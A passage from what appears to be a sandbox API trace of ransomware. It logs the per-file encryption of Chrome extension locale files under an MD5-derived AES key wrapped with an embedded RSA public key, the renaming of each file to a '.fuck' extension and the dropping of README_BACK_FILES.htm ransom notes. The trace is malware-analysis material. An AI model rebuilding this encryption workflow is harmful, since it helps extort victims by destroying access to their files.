Final=1, dwFlags=0x0, pbData=0x2e17150*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17150*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.510] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17150*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17150*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.512] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcc, lpOverlapped=0x0) returned 1 [0254.514] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcc, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.514] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.514] CloseHandle (hObject=0x5d5c) returned 1 [0254.514] CloseHandle (hObject=0x5d60) returned 1 [0254.514] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0254.518] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0254.519] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg")) returned 1 [0254.520] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.fuck")) returned 1 [0254.521] CryptDestroyHash (hHash=0x2e18768) returned 1 [0254.521] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.521] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.522] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.522] FindClose (in: hFindFile=0x2e180a8 | out: hFindFile=0x2e180a8) returned 1 [0254.522] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0254.522] AreFileApisANSI () returned 1 [0254.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.522] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.523] GetFileType (hFile=0x5d50) returned 0x1 [0254.523] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.524] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.524] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18768 [0254.525] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.525] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.525] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.525] GetLastError () returned 0x0 [0254.525] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json")) returned 0x20 [0254.525] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0254.536] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.537] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.538] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.538] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.550] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.550] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.550] CryptHashData (hHash=0x2e186a8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.550] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0254.550] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.550] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.550] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17bf0) returned 1 [0254.551] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17bf0, dwCertEncodingType=0x1, pInfo=0x298ec20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298ec50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298ec58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e184a8) returned 1 [0254.551] CryptEncrypt (in: hKey=0x2e184a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.551] CryptEncrypt (in: hKey=0x2e184a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17e98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17e98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.551] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17e98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17e98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.552] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe3, lpOverlapped=0x0) returned 1 [0254.554] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0254.554] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0254.554] CloseHandle (hObject=0x5d60) returned 1 [0254.554] CloseHandle (hObject=0x5d5c) returned 1 [0254.554] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0254.566] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0254.569] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0254.572] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0254.577] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0254.577] CryptDestroyKey (hKey=0x2e18828) returned 1 [0254.577] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.577] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.577] FindClose (in: hFindFile=0x2e18768 | out: hFindFile=0x2e18768) returned 1 [0254.577] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0254.577] AreFileApisANSI () returned 1 [0254.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0254.577] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.578] GetFileType (hFile=0x5d50) returned 0x1 [0254.579] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.580] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.580] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18768 [0254.581] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.581] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.581] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.581] GetLastError () returned 0x0 [0254.582] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json")) returned 0x20 [0254.582] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0254.582] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.583] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.584] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.584] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.587] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.587] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.587] CryptHashData (hHash=0x2e18468, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.587] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18468, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18568) returned 1 [0254.587] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.588] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.588] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17d88) returned 1 [0254.589] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17d88, dwCertEncodingType=0x1, pInfo=0x298ecf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298ed20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298ed28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18528) returned 1 [0254.589] CryptEncrypt (in: hKey=0x2e18528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.589] CryptEncrypt (in: hKey=0x2e18528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17f20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17f20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.589] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17f20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17f20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.590] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd4, lpOverlapped=0x0) returned 1 [0254.592] CryptEncrypt (in: hKey=0x2e18568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0254.592] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0254.592] CloseHandle (hObject=0x5d5c) returned 1 [0254.592] CloseHandle (hObject=0x5d60) returned 1 [0254.592] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0254.596] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0254.597] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.gsg")) returned 1 [0254.598] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 